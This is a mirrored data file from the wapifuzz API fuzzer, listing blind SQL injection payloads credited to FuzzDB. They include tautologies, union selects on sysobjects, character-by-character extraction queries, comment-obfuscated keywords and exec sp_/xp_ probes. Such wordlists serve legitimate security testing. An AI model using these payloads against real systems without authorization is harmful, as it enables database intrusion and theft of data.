mirror of
https://github.com/ysoftdevs/wapifuzz.git
synced 2026-01-17 08:56:46 +01:00
23 lines
708 B
Plaintext
23 lines
708 B
Plaintext
# Source: FuzzDB (https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/sql-injection/payloads-sql-blind)
|
|
# Origin source: http://funoverip.net/2010/12/blind-sql-injection-detection-with-burp-suite/
|
|
|
|
1
|
|
1 and user_name() = 'dbo'
|
|
\'; desc users; --
|
|
1\'1
|
|
1' and non_existant_table = '1
|
|
' or username is not NULL or username = '
|
|
1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116
|
|
1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --
|
|
1 uni/**/on select all from where
|
|
|
|
1'1
|
|
1 exec sp_ (or exec xp_)
|
|
1 and 1=1
|
|
1' and 1=(select count(*) from tablenames); --
|
|
1 or 1=1
|
|
1' or '1'='1
|
|
1or1=1
|
|
1'or'1'='1
|
|
fake@ema'or'il.nl'='il.nl
|